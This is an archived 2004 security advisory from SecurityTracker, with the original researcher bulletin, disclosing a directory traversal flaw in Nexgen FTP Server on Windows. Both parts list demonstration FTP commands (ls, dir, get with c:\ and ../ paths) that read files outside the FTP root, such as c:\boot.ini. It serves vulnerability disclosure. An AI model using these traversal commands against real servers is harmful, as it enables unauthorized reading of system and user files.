SecurityTracker.com Archives

Category:  Application (File Transfer/Sharing)  >  Nexgen FTP Server    Vendors:  nexgenserver.com
Nexgen FTP Server Discloses Arbitrary Files to Remote Authenticated Users
SecurityTracker Alert ID:  1009545
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Mar 24 2004
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes   Vendor Confirmed:  Yes
Advisory:  Global Security Solution IT (GSSIT)
Description:  Ziv Kamir of Global Security Solution IT reported a file disclosure vulnerability in the Nexgen FTP Server. A remote authenticated user can read files on the target system that are located outside of the FTP root directory.

It is reported that a remote authenticated user can read files outside the FTP root by supplying either an absolute Windows path (a drive letter such as c:\) or '..' directory traversal sequences, with either '\' or '/' as the separator, as the path argument of FTP commands; the server does not check that the resolved path still lies beneath the FTP root.

Some demonstration exploit commands are provided, as typed at an FTP client prompt (the client sends ls and dir to the server as NLST/LIST requests and get as a RETR request):

ls c:\*.*
ls ..
ls \..\
ls /../
dir c:\
dir \..\*.*
get c:\"Exist File"
get \..\"Exist File"

The vendor was reportedly notified on March 23, 2004.

Impact:  A remote authenticated user, including an anonymous user where anonymous login is enabled, can read any file on the target system that is accessible with the privileges of the FTP service (the report demonstrates c:\boot.ini).
Solution:  No fix was available at the time of this entry. The vendor has reportedly written a fix and will release it once testing of the fix is complete.
Vendor URL:  nexgenserver.com/NexgenFTPServer/
Cause:  Access control error, Input validation error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)
Reported By:  GSS IT <gss_it@yahoo.com>
Message History:   None.


 Source Message Contents

Date:  Wed, 24 Mar 2004 02:24:45 -0800 (PST)
From:  GSS IT <gss_it@yahoo.com>
Subject:  Nexgen FTP Server

24/03/04


====================================
 GSSIT - Global Security Solution IT
====================================		

-------------------------------------------------------

Application: Nexgen FTP Server
Web Site:    http://www.nexgenserver.com/
Versions:
Platform:    Windows
Bug  :       Directory Traversal

Credits:
########

#########################################
#         ==  Ziv Kamir ==              #
#                                       #
# GSSIT - Global Security Solution IT   #                   
#                                       #
#     Email : gss_it@yahoo.com          #
#                                       #
#                                       #
#########################################

---------------------

1) Introduction
2) Bug
3) The Code
4) Fix


================
1) Introduction
================

Developed using the Nexgen Server SDK, the Nexgen FTP Server is a full-featured FTP Server that can be easily customized to fit your needs. Running as a service on your PC, the Nexgen FTP Server gives you peace of mind because you'll always know that if the PC is running, then the server is running. Included with the Nexgen FTP Server is an administration application that you can use to remotely monitor and/or configure the Nexgen FTP Server. Use the administration application to manage all aspects of the FTP Server (or servers) that are running on the service's PC.

=======
2) Bugs
=======

1) Directory Traversal

===========
3) The Code
===========

1) Any authenticated user can read arbitrary files outside the FTP root directory

ls c:\*.*
ls ..
ls \..\
ls /../
dir c:\
dir \..\*.*
get c:\"Exist File"      [ c:\boot.ini ]
get \..\"Exist File"

======
4) Fix
======

Date of Vendor Notification:
----------------------------
23/03/04

Response:
---------
24/03/04

Thanks. I've tested some new code, and I think I've got it squashed. I'll get it uploaded after I test out the installations.

==============================================================================================
*** The Data is for educational purpose only.
*** The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
==============================================================================================








Copyright 2004, SecurityGlobal.net LLC